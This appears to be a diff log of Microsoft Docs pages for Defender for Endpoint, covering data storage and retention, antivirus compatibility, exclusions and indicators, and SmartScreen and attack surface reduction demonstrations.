--- Proactively identify indicators of attack (IOAs) in your organization-- Generate alerts if a possible attack was detected-- Provide your security operations with a view into devices, files, and URLs related to threat signals from your network, enabling you to investigate and explore the presence of security threats on the network.-
-Microsoft doesn't use your data for advertising.
-
-## Data protection and encryption
-
-The Defender for Endpoint service utilizes state-of-the-art data protection technologies, which are based on Microsoft Azure infrastructure.
-
-There are various aspects relevant to data protection that our service takes care of. Encryption is one of the most critical aspects, and it includes data encryption at rest, encryption in flight, and key management with Key Vault. For more information on other technologies used by the Defender for Endpoint service, see [Azure encryption overview](/azure/security/security-azure-encryption-overview).
-
-In all scenarios, data is encrypted using 256-bit [AES encryption](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) at the minimum.
-
-## Data storage location
-
-Defender for Endpoint operates in the Microsoft Azure data centers in the European Union, the United Kingdom, the United States, or in Australia. Customer data collected by the service might be stored in: (a) the geo-location of the tenant as identified during provisioning or, (b) the geo-location as defined by the data storage rules of an online service if this online service is used by Defender for Endpoint to process such data. For more information, see [Where your Microsoft 365 customer data is stored](/microsoft-365/enterprise/o365-data-locations).
-
-Customer data in pseudonymized form may also be stored in the central storage and processing systems in the United States.
-
-Select **Need help?** in the Microsoft Defender portal to contact Microsoft support about provisioning Microsoft Defender XDR in a different data center location.
-
-## Data sharing for Microsoft Defender for Endpoint
-
-Microsoft Defender for Endpoint shares data, including customer data, among the following Microsoft products, also licensed by the customer.
--- Microsoft Sentinel-- Microsoft Tunnel for Mobile Application Management - Android-- Microsoft Defender for Cloud-- Microsoft Defender for Identity-- Microsoft Security Exposure Management (public preview)-
-## Is my data isolated from other customer data?
-
-Yes, your data is isolated through access authentication and logical segregation based on customer identifier. Each customer can only access data collected from its own organization, and the generic data that Microsoft provides.
-
-## How does Microsoft prevent malicious insider activities and abuse of high privilege roles?
-
-Microsoft developers and administrators have, by design, been given sufficient privileges to carry out their assigned duties to operate and evolve the service. Microsoft deploys combinations of preventive, detective, and reactive controls including the following mechanisms to help protect against unauthorized developer and/or administrative activities:
--- Tight access control to sensitive data-- Combinations of controls that greatly enhance independent detection of malicious activity-- Multiple levels of monitoring, logging, and reporting-
-Additionally, Microsoft conducts background verification checks of certain operations personnel, and limits access to applications, systems, and network infrastructure in proportion to the level of background verification. Operations personnel follow a formal process when they're required to access a customer's account or related information in the performance of their duties.
-
-Access to data for services deployed in Microsoft Azure Government data centers is only granted to operating personnel who have been screened and approved to handle data that's subject to certain government regulations and requirements, such as FedRAMP, NIST 800.171 (DIB), ITAR, IRS 1075, DoD L4, and CJIS.
-
-## Is data shared with other customers?
-
-No. Customer data is isolated from other customers and isn't shared. However, threat intelligence on the data resulting from Microsoft processing, and which doesn't contain any customer-specific data, might be shared with other customers. Each customer can only access data collected from its own organization and generic data that Microsoft provides.
-
-## How long will Microsoft store my data? What is Microsoft's data retention policy?
-
-### At service onboarding
-
-Data from Microsoft Defender for Endpoint is retained for 180 days, visible across the portal. However, in the advanced hunting investigation experience, it's accessible via a query for 30 days.
-
-### At contract termination or expiration
-
-Your data is kept and is available to you while the license is under grace period or suspended mode. At the end of this period, that data will be erased from Microsoft's systems to make it unrecoverable, no later than 180 days from contract termination or expiration.
-
-### Advanced Hunting data
-
-Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30 days of raw data.
-
-## Can Microsoft help us maintain regulatory compliance?
-
-Microsoft provides customers with detailed information about Microsoft's security and compliance programs, including audit reports and compliance packages, to help them assess Defender for Endpoint services against their own legal and regulatory requirements. Defender for Endpoint has achieved a number of certifications including ISO, SOC, FedRAMP High, and PCI and continues to pursue additional national, regional, and industry-specific certifications.
-
-By providing customers with compliant, independently verified services, Microsoft makes it easier for them to achieve compliance for the infrastructure and applications they run.
-
-For more information on the Defender for Endpoint certification reports, see [Microsoft Trust Center](https://servicetrust.microsoft.com/).
-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-datastorage-belowfoldlink)
security Defender Compatibility https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-compatibility.md
- Title: Antivirus solution compatibility with Defender for Endpoint
-description: Learn about how Windows Defender works with Microsoft Defender for Endpoint. Also learn how Defender for Endpoint works when a third-party anti-malware client is used.
------- m365-security-- tier2-- mde-ngp- Previously updated : 02/18/2024---
-# Antivirus solution compatibility with Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-defendercompat-abovefoldlink)
-
-The Microsoft Defender for Endpoint agent depends on Microsoft Defender Antivirus for some capabilities such as file scanning.
-
-> [!IMPORTANT]
-> Endpoint detection and response (EDR) in Defender for Endpoint does not adhere to the Microsoft Defender Antivirus Exclusions settings.
-
-For optimal protection, configure the following settings for devices that are onboarded to Defender for Endpoint, whether Microsoft Defender Antivirus is the active antimalware solution or not:
--- Security intelligence updates (which also updates the scan engine)-- Platform Update updates-
-For more information, see [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).
-
-If an onboarded device is protected by a non-Microsoft anti-malware client, Microsoft Defender Antivirus goes into [passive mode](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility). In this scenario, Microsoft Defender Antivirus continues to receive updates, and the `msmpeng.exe` process is listed as a running a service. But, it doesn't perform real-time protection scans, scheduled scans, or on-demand scans, and doesn't replace the running non-Microsoft antimalware client. The Microsoft Defender Antivirus user interface is disabled. Device users can't use Microsoft Defender Antivirus to perform on-demand scans or configure most options such as Attack Surface Reduction (ASR) rules, Network Protection, Indicators - File/IP address/URL/Certificates allow/block, Web Content Filtering, Controlled Folder Access, and so forth.
-
-For more information, see the [Microsoft Defender Antivirus and Defender for Endpoint compatibility topic](microsoft-defender-antivirus-compatibility.md).
-
security Defender Endpoint Antivirus Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-antivirus-exclusions.md
- Title: Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
-description: Learn about exclusions for Defender for Endpoint and Microsoft Defender Antivirus. Suppress alerts, submit files for analysis, and define exclusions and indicators to reduce noise and risk for your organization.
------ Previously updated : 08/07/2023----- m365-security-- tier2-- mde-ngp--
-# Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
--
-**Applies to:**
--- Microsoft Defender Antivirus-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-**Platforms**
--- Windows-
-> [!NOTE]
-> As a Microsoft MVP, [Fabian Bader](https://cloudbrothers.info) contributed to and provided material feedback for this article.
-
-[Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) includes a wide range of capabilities to prevent, detect, investigate, and respond to advanced cyberthreats. These capabilities include [Next-generation protection](next-generation-protection.md) (which includes Microsoft Defender Antivirus). As with any endpoint protection or antivirus solution, sometimes files, folders, or processes that aren't actually a threat can be detected as malicious by Defender for Endpoint or Microsoft Defender Antivirus. These entities can be blocked or sent to quarantine, even though they're not really a threat.
-
-You can take certain actions to prevent false positives and similar issues from occurring. These actions include:
--- [Submitting a file to Microsoft for analysis](#submitting-files-for-analysis)-- [Suppressing an alert](#suppressing-alerts)-- [Adding an exclusion or indicator](#exclusions-and-indicators)-
-This article explains how these actions work, and describes the various types of exclusions that can be defined for Defender for Endpoint and Microsoft Defender Antivirus.
-
-> [!CAUTION]
-> **Defining exclusions reduces the level of protection offered by Defender for Endpoint and Microsoft Defender Antivirus**. Use exclusions as a last resort, and make sure to define only the exclusions that are necessary. Make sure to review your exclusions periodically, and remove the ones you no longer need. See [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and [Common mistakes to avoid](common-exclusion-mistakes-microsoft-defender-antivirus.md).
-
-## Submissions, suppressions, and exclusions
-
-When you're dealing with false positives, or known entities that are generating alerts, you don't necessarily need to add an exclusion. Sometimes classifying and suppressing an alert is enough. We recommend submitting false positives (and false negatives) to Microsoft for analysis as well. The following table describes some scenarios and what steps to take with respect to file submissions, alert suppressions, and exclusions.
-
-| Scenario | Steps to consider |
-|:|:-|
-| [False positive](defender-endpoint-false-positives-negatives.md): An entity, such as a file or a process, was detected and identified as malicious, even though the entity isn't a threat. | 1. [Review and classify alerts](defender-endpoint-false-positives-negatives.md#part-1-review-and-classify-alerts) that were generated as a result of the detected entity. <br/>2. [Suppress an alert](defender-endpoint-false-positives-negatives.md#suppress-an-alert) for a known entity. <br/>3. [Review remediation actions](defender-endpoint-false-positives-negatives.md#part-2-review-remediation-actions) that were taken for the detected entity. <br/>4. [Submit the false positive to Microsoft](../defender/submission-guide.md) for analysis. <br/>5. [Define an exclusion](defender-endpoint-false-positives-negatives.md#part-3-review-or-define-exclusions) for the entity (only if necessary). |
-| [Performance issues](troubleshoot-performance-issues.md) such as one of the following issues:<br/>- A system is having high CPU usage or other performance issues.<br/>- A system is having memory leak issues.<br/>- An app is slow to load on devices.<br/>- An app is slow to open a file on devices. | 1. [Collect diagnostic data](collect-diagnostic-data.md) for Microsoft Defender Antivirus.<br/>2. If you're using a non-Microsoft antivirus solution, [check with the vendor for any needed exclusions](troubleshoot-performance-issues.md#check-with-vendor-for-antivirus-exclusions).<br/>3. [Analyze the Microsoft Protection Log](troubleshoot-performance-issues.md#analyze-the-microsoft-protection-log) to see the estimated performance impact.<br/>4. [Define an exclusion for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md) (if necessary).<br/>5. [Create an indicator for Defender for Endpoint](manage-indicators.md) (only if necessary). |
-| [Compatibility issues](microsoft-defender-antivirus-compatibility.md) with non-Microsoft antivirus products. <br/>Example: Defender for Endpoint relies on security intelligence updates for devices, whether they're running Microsoft Defender Antivirus or a non-Microsoft antivirus solution. | 1. If you're using a non-Microsoft antivirus product as your primary antivirus/antimalware solution, [set Microsoft Defender Antivirus to passive mode](microsoft-defender-antivirus-compatibility.md#requirements-for-microsoft-defender-antivirus-to-run-in-passive-mode).<br/>2. If you're switching from a non-Microsoft antivirus/antimalware solution to Defender for Endpoint, see [Make the switch to Defender for Endpoint](switch-to-mde-overview.md). This guidance includes:<br/>- [Exclusions you might need to define for the non-Microsoft antivirus/antimalware solution](switch-to-mde-phase-2.md#step-3-add-microsoft-defender-for-endpoint-to-the-exclusion-list-for-your-existing-solution);<br/>- [Exclusions you might need to define for Microsoft Defender Antivirus](switch-to-mde-phase-2.md#step-4-add-your-existing-solution-to-the-exclusion-list-for-microsoft-defender-antivirus); and <br/>- [Troubleshooting information](switch-to-mde-troubleshooting.md) (just in case something goes wrong while migrating). |
-
-> [!IMPORTANT]
-> An "allow" indicator is the strongest type of exclusion you can define in Defender for Endpoint. Make sure to use indicators sparingly (only when necessary), and review all exclusions periodically.
-
-## Submitting files for analysis
-
-If you have a file that you think is wrongly detected as malware (a false positive), or a file that you suspect might be malware even though it wasn't detected (a false negative), you can submit the file to Microsoft for analysis. Your submission is scanned immediately, and will then be reviewed by Microsoft security analysts. You're able to check the status of your submission on the [submission history page](https://www.microsoft.com/wdsi/submissionhistory).
-
-Submitting files for analysis helps reduce false positives and false negatives for all customers. To learn more, see the following articles:
--- [Submit files for analysis](/microsoft-365/security/intelligence/submission-guide) (available to all customers)-- [Submit files using the new unified submissions portal in Defender for Endpoint](admin-submissions-mde.md) (available to customers who have Defender for Endpoint Plan 2 or Microsoft Defender XDR)-
-## Suppressing alerts
-
-If you're getting alerts in the Microsoft Defender portal for tools or processes that you know aren't actually a threat, you can suppress those alerts. To suppress an alert, you create a suppression rule, and specify what actions to take for that on other, identical alerts. You can create suppression rules for a specific alert on a single device, or for all alerts that have the same title across your organization.
-
-To learn more, see the following articles:
--- [Suppress alerts](manage-alerts.md#suppress-alerts)-- [Introducing the new alert suppression experience](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/introducing-the-new-alert-suppression-experience/ba-p/3562719) (for Defender for Endpoint)-
-## Exclusions and indicators
-
-Sometimes, the term *exclusions* is used to refer to exceptions that apply across Defender for Endpoint and Microsoft Defender Antivirus. A more accurate way to describe these exceptions is as follows:
--- [Indicators for Defender for Endpoint](manage-indicators.md); (which apply across Defender for Endpoint and Microsoft Defender Antivirus); and-- [Exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md).-
-The following table summarizes exclusion types that can be defined for Defender for Endpoint and Microsoft Defender Antivirus.
-
-> [!TIP]
->
-> - [Defender for Endpoint Plan 1](defender-endpoint-plan-1.md) is available as a standalone plan, and is included in Microsoft 365 E3.
-> - [Defender for Endpoint Plan 2](microsoft-defender-endpoint.md) is available as a standalone plan, and is included in Microsoft 365 E5.
-> - If you have Microsoft 365 E3 or E5, make sure to [set up your Defender for Endpoint capabilities](deployment-strategy.md).
-
-| Product/service | Exclusion types |
-|:|:-|
-| [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md) <br/>[Defender for Endpoint Plan 1 or Plan 2](microsoft-defender-endpoint.md) | - [Automatic exclusions](#automatic-exclusions) (for active roles on Windows Server 2016 and later)<br/>- [Built-in exclusions](#built-in-exclusions) (for operating system files in Windows)<br/>- [Custom exclusions](#custom-exclusions), such as process-based exclusions, folder location-based exclusions, file extension exclusions, or contextual file and folder exclusions<br/>- [Custom remediation actions](#custom-remediation-actions) based on threat severity or for specific threats<br/><br/>*The standalone versions of Defender for Endpoint Plan 1 and Plan 2 don't include server licenses. To onboard servers, you need another license, such as Microsoft Defender for Endpoint for Servers or [Microsoft Defender for Servers Plan 1 or 2](/azure/defender-for-cloud/defender-for-servers-introduction). To learn more, see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md).*<br/><br/>*If you're a small or medium-sized business using [Microsoft Defender for Business](../defender-business/mdb-overview.md), you can get [Microsoft Defender for Business servers](../defender-business/get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).* |
-| [Defender for Endpoint Plan 1 or Plan 2](microsoft-defender-endpoint.md) | - [Indicators](#defender-for-endpoint-indicators) for files, certificates, or IP addresses, URLs/domains<br/>- [Attack surface reduction exclusions](#attack-surface-reduction-exclusions)<br/>- [Controlled folder access exclusions](#controlled-folder-access-exclusions) |
-| [Defender for Endpoint Plan 2](microsoft-defender-endpoint.md) | [Automation folder exclusions](#automation-folder-exclusions) (for automated investigation and remediation) |
-
-The following sections describe these exclusions in more detail:
--- [Microsoft Defender Antivirus exclusions](#microsoft-defender-antivirus-exclusions)-- [Defender for Endpoint indicators](#defender-for-endpoint-indicators)-- [Attack surface reduction exclusions](#attack-surface-reduction-exclusions)-- [Controlled folder access exclusions](#controlled-folder-access-exclusions)-- [Automation folder exclusions](#automation-folder-exclusions) (for automated investigation and remediation)-
-## Microsoft Defender Antivirus exclusions
-
-Microsoft Defender Antivirus exclusions can apply to antivirus scans and/or to real-time protection. These exclusions include:
--- [Automatic exclusions](#automatic-exclusions) (for server roles on Windows Server 2016 and later)-- [Built-in exclusions](#built-in-exclusions) (for operating system files in all versions of Windows)-- [Custom exclusions](#custom-exclusions) (for files and folders that you specify, if necessary)-- [Custom remediation actions](#custom-remediation-actions) (to determine what happens with detected threats)-
-### Automatic exclusions
-
-[Automatic exclusions](configure-server-exclusions-microsoft-defender-antivirus.md#automatic-server-role-exclusions) (also referred to as *automatic server role exclusions*) include exclusions for server roles and features in Windows Server. These exclusions aren't scanned by [real-time protection](configure-protection-features-microsoft-defender-antivirus.md) but are still subject to [quick, full, or on-demand antivirus scans](schedule-antivirus-scans.md#comparing-the-quick-scan-full-scan-and-custom-scan).
-
-Examples include:
--- File Replication Service (FRS)-- Hyper-V-- SYSVOL-- Active Directory-- DNS Server-- Print Server-- Web Server-- Windows Server Update Services-- ...and more.-
-> [!NOTE]
-> Automatic exclusions for server roles aren't supported on Windows Server 2012 R2. For servers running Windows Server 2012 R2 with the Active Directory Domain Services (AD DS) server role installed, exclusions for domain controllers must be specified manually. See [Active Directory exclusions](configure-server-exclusions-microsoft-defender-antivirus.md#active-directory-exclusions).
-
-For more information, see [Automatic server role exclusions](configure-server-exclusions-microsoft-defender-antivirus.md#automatic-server-role-exclusions).
-
-### Built-in exclusions
-
-[Built-in exclusions](configure-server-exclusions-microsoft-defender-antivirus.md#built-in-exclusions) include certain operating system files that are excluded by Microsoft Defender Antivirus on all versions of Windows (including Windows 10, Windows 11, and Windows Server).
-
-Examples include:
--- `%windir%\SoftwareDistribution\Datastore\*\Datastore.edb` -- `%allusersprofile%\NTUser.pol`-- Windows Update files-- Windows Security files -- ... and more.-
-The list of built-in exclusions in Windows is kept up to date as the threat landscape changes. To learn more about these exclusions, see [Microsoft Defender Antivirus exclusions on Windows Server: Built-in exclusions](configure-server-exclusions-microsoft-defender-antivirus.md#built-in-exclusions).
-
-### Custom exclusions
-
-[Custom exclusions](configure-exclusions-microsoft-defender-antivirus.md) include files and folders that you specify. Exclusions for files, folders, and processes will be skipped by scheduled scans, on-demand scans, and real-time protection. Exclusions for process-opened files won't be scanned by [real-time protection](configure-protection-features-microsoft-defender-antivirus.md) but are still subject to [quick, full, or on-demand antivirus scans](schedule-antivirus-scans.md#comparing-the-quick-scan-full-scan-and-custom-scan).
-
-### Custom remediation actions
-
-When Microsoft Defender Antivirus detects a potential threat while running a scan, it attempts to remediate or remove the detected threat. You can define custom remediation actions to configure how Microsoft Defender Antivirus should address certain threats, whether a restore point should be created before remediating, and when threats should be removed. [Configure remediation actions for Microsoft Defender Antivirus detections](configure-remediation-microsoft-defender-antivirus.md).
-
-## Defender for Endpoint indicators
-
-You can define [indicators](manage-indicators.md) with specific actions for entities, such as files, IP addresses, URLs/domains, and certificates. In Defender for Endpoint, indicators are referred to as Indicators of Compromise (IoCs), and less often, as custom indicators. When you define your indicators, you can specify one of the following actions:
--- **Allow** ΓÇô Defender for Endpoint won't block files, IP addresses, URLs/domains, or certificates that have Allow indicators. (*Use this action with caution.*)--- **Audit** ΓÇô Files, IP addresses, and URLs/domains with Audit indicators are monitored, and when they're accessed by users, informational alerts are generated in the Microsoft Defender portal.--- **Block and Remediate** ΓÇô Files or certificates with Block and Remediate indicators are blocked and quarantined when detected.--- **Block Execution** ΓÇô IP addresses and URLs/domains with Block Execution indicators are blocked. Users can't access those locations.--- **Warn** ΓÇô IP addresses and URLs/domains with Warn indicators cause a warning message to be displayed when a user attempts to access those locations. Users can choose to bypass the warning and proceed to the IP address or URL/domain.-
-> [!IMPORTANT]
-> You can have up to 15,000 indicators in your tenant.
-
-The following table summarizes IoC types and available actions:
-
-| Indicator type | Available actions |
-|:|:|
-| [Files](indicator-file.md) | - Allow <br/> - Audit <br/> - Warn <br/> - Block execution <br/> - Block and remediate |
-| [IP addresses and URLs/domains](indicator-ip-domain.md) | - Allow <br/> - Audit <br/> - Warn <br/> - Block execution |
-| [Certificates](indicator-certificates.md) | - Allow <br/> - Block and remediate |
-
-> [!TIP]
-> See the following resources to learn more about indicators:
->
-> - [Create indicators](manage-indicators.md)
-> - [Create indicators for files](indicator-file.md)
-> - [Create indicators for IP addresses and URLs/domains](indicator-ip-domain.md)
-> - [Create indicators based on certificates](indicator-certificates.md)
-> - [Manage indicators](indicator-manage.md)
-
-## Attack surface reduction exclusions
-
-[Attack surface reduction rules](attack-surface-reduction.md) (also known as ASR rules) target certain software behaviors, such as:
--- Launching executable files and scripts that attempt to download or run files-- Running scripts that seem to be obfuscated or otherwise suspicious-- Performing behaviors that apps don't usually initiate during normal day-to-day work-
-Sometimes, legitimate applications exhibit software behaviors that could be blocked by attack surface reduction rules. If that's occurring in your organization, you can define exclusions for certain files and folders. Such exclusions are applied to all attack surface reduction rules. See [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md#exclude-files-and-folders).
-
-Also note that while most ASR rules exclusions are independent from Microsoft Defender Antivirus exclusions, some ASR rules do honor some Microsoft Defender Antivirus exclusions. See [Attack surface reduction rules reference - Microsoft Defender Antivirus exclusions and ASR rules](attack-surface-reduction-rules-reference.md#microsoft-defender-antivirus-exclusions-and-asr-rules).
-
-## Controlled folder access exclusions
-
-[Controlled folder access](controlled-folders.md) monitors apps for activities that are detected as malicious and protects the contents of certain (protected) folders on Windows devices. Controlled folder access allows only trusted apps to access protected folders, such as common system folders (including boot sectors) and other folders that you specify. You can allow certain apps or signed executables to access protected folders by defining exclusions. See [Customize controlled folder access](customize-controlled-folders.md).
-
-## Automation folder exclusions
-
-Automation folder exclusions apply to [automated investigation and remediation](automated-investigations.md) in Defender for Endpoint, which is designed to examine alerts and take immediate action to resolve detected breaches. As alerts are triggered, and an automated investigation runs, a verdict (Malicious, Suspicious, or No threats found) is reached for each piece of evidence investigated. Depending on the [automation level](automation-levels.md) and other security settings, remediation actions can occur automatically or only upon approval by your security operations team.
-
-You can specify folders, file extensions in a specific directory, and file names to be excluded from automated investigation and remediation capabilities. Such automation folder exclusions apply to all devices onboarded to Defender for Endpoint. These exclusions are still subject to antivirus scans. See [Manage automation folder exclusions](manage-automation-folder-exclusions.md).
-
-## How exclusions and indicators are evaluated
-
-Most organizations have several different types of exclusions and indicators to determine whether users should be able to access and use a file or process. Exclusions and indicators are processed in a particular order so that [policy conflicts are handled systematically](indicator-file.md#policy-conflict-handling).
-
-The following image summarizes how exclusions and indicators are handled across Defender for Endpoint and Microsoft Defender Antivirus:
--
-Here's how it works:
-
-1. If a detected file/process isn't allowed by Windows Defender Application Control and AppLocker, it's blocked. Otherwise, it proceeds to Microsoft Defender Antivirus.
-
-2. If the detected file/process isn't part of an exclusion for Microsoft Defender Antivirus, it's blocked. Otherwise, Defender for Endpoint checks for a custom indicator for the file/process.
-
-3. If the detected file/process has a Block or Warn indicator, that action is taken. Otherwise, the file/process is allowed, and proceeds to evaluation by attack surface reduction rules, controlled folder access, and SmartScreen protection.
-
-4. If the detected file/process isn't blocked by attack surface reduction rules, controlled folder access, or SmartScreen protection, it proceeds to Microsoft Defender Antivirus.
-
-5. If the detected file/process isn't allowed by Microsoft Defender Antivirus, it's checked for an action based on its threat ID.
-
-## How policy conflicts are handled
-
-In cases where Defender for Endpoint indicators conflict, here's what to expect:
--- If there are conflicting file indicators, the indicator that uses the most secure hash is applied. For example, SHA256 takes precedence over SHA-1, which takes precedence over MD5.--- If there are conflicting URL indicators, the more strict indicator is used. For [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview), an indicator that uses the longest URL path is applied. For example, `www.dom.ain/admin/` takes precedence over `www.dom.ain`. ([Network protection](network-protection.md) applies to domains, rather than subpages within a domain.)--- If there are similar indicators for a file or process that have different actions, the indicator that is scoped to a specific device group takes precedence over an indicator that targets all devices.-
-## How automated investigation and remediation works with indicators
-
-[Automated investigation and remediation capabilities](automated-investigations.md) in Defender for Endpoint first determine a verdict for each piece of evidence, and then take an action depending on Defender for Endpoint indicators. Thus, a file/process could get a verdict of "good" (which means no threats were found) and still be blocked if there's an indicator with that action. Similarly, an entity could get a verdict of "bad" (which means it's determined to be malicious) and still be allowed if there's an indicator with that action.
-
-The following diagram shows how [automated investigation and remediation works with indicators](manage-indicators.md#automated-investigation-and-remediation-engine):
--
-## Other server workloads and exclusions
-
-If your organization is using other server workloads, such as Exchange Server, SharePoint Server, or SQL Server, be aware that only built-in server roles (that could be prerequisites for software you install later) on Windows Server are excluded by [automatic exclusions](#automatic-exclusions) feature (and only when using their default installation location). You'll likely need to define antivirus exclusions for these other workloads, or for all workloads if you disable automatic exclusions.
-
-Here are some examples of technical documentation to identify and implement the exclusions you need:
--- [Running antivirus software on Exchange Server](/exchange/antispam-and-antimalware/windows-antivirus-software?view=exchserver-2019&preserve-view=true)-- [Folders to exclude from antivirus scans on SharePoint Server](https://support.microsoft.com/office/certain-folders-may-have-to-be-excluded-from-antivirus-scanning-when-you-use-file-level-antivirus-software-in-sharepoint-01cbc532-a24e-4bba-8d67-0b1ed733a3d9)-- [Choosing antivirus software for SQL Server](https://support.microsoft.com/topic/how-to-choose-antivirus-software-to-run-on-computers-that-are-running-sql-server-feda079b-3e24-186b-945a-3051f6f3a95b)-
-Depending on what you're using, you might need to refer to the documentation for that server workload.
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors, Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations, such as:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-## See also
--- [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions)-- [Common mistakes to avoid when defining exclusions](common-exclusion-mistakes-microsoft-defender-antivirus.md)-- [Blog post: The Hitchhiker's Guide to Microsoft Defender for Endpoint exclusions](https://cloudbrothers.info/en/guide-to-defender-exclusions/)-
security Defender Endpoint Demonstration App Reputation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-app-reputation.md
- Title: Microsoft Defender for Endpoint SmartScreen app reputation demonstration
-description: Test how Microsoft Defender for Endpoint SmartScreen helps you identify phishing and malware websites
------- m365-security-- tier2-- demo- Previously updated : 01/15/2024--
-# SmartScreen app reputation demonstration
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Test how Microsoft Defender for Endpoint SmartScreen helps you identify phishing and malware websites based on App reputation.
-
-## Scenario requirements and setup
--- Windows 11 or Windows 10-- Windows Server 2022 or Windows Server 2019 or Windows Server 2016 or Windows Server 2012 R2 or Windows Server 2008 R2 -- Microsoft Edge or Internet Explorer browser required-- To turn ON/OFF, go to **Settings** > **Update & Security** > **Windows Security** > **Open Windows Security** > **App & browser control** > **Check apps and files**-
-## Scenario Demos
-
-### Known good program
-
-This program has a good reputation; the download should run uninterrupted:
--- [Known good program download](https://demo.smartscreen.msft.net/download/known/freevideo.exe)-
- Launching this link should render a message similar to the following:
-
- :::image type="content" source="media/smartscreen-app-reputation-known-good.png" alt-text="Based on the target file's reputation, SmartScreen allows the download without interference.":::
-
-### Unknown program
-
-Because the program download doesn't have sufficient reputation to ensure that it's trustworthy, SmartScreen will show a warning before running the program download.
--- [Unknown program](https://demo.smartscreen.msft.net/download/unknown/freevideo.exe)
-
- Launching this link should render a message similar to the following:
-
- :::image type="content" source="media/smartscreen-app-reputation-unknown.png" alt-text="SmartScreen doesn't have sufficient reputation information about the download file, and warns the user to stop or proceed with caution.":::
-
-### Known malware
-
-This download is known malware; SmartScreen should block this program from running.
--- [Known malware](https://demo.smartscreen.msft.net/download/known/knownmalicious.exe)-
-Launching this link should render a message similar to the following:
-
- :::image type="content" source="media/smartscreen-app-reputation-known-malware.png" alt-text="Screenshot showing how SmartScreen detects a file download with an unsafe reputation; the download is blocked.":::
-
-## Learn more
-
-[Microsoft Defender SmartScreen Documentation](/windows/security/threat-protection/windows-defender-smartscreen/windows-defender-smartscreen-overview)
-
-## See also
-
-[Microsoft Defender for Endpoint - demonstration scenarios](defender-endpoint-demonstrations.md)
security Defender Endpoint Demonstration Attack Surface Reduction Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-demonstration-attack-surface-reduction-rules.md
- Title: Microsoft Defender for Endpoint attack surface reduction rules demonstrations
-description: See how attack surface reduction rules block various known threat types.
------- m365-security-- tier2-- demo-- Previously updated : 01/15/2024--
-# Attack surface reduction rules demonstrations
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)-
-Attack surface reduction rules target specific behaviors that are typically used by malware and malicious apps to infect machines, such as:
--- Executable files and scripts used in Office apps or web mail that attempt to download or run files-- Scripts that are obfuscated or otherwise suspicious-- Behaviors that apps undertake that aren't initiated during normal day-to-day work-
-## Scenario requirements and setup
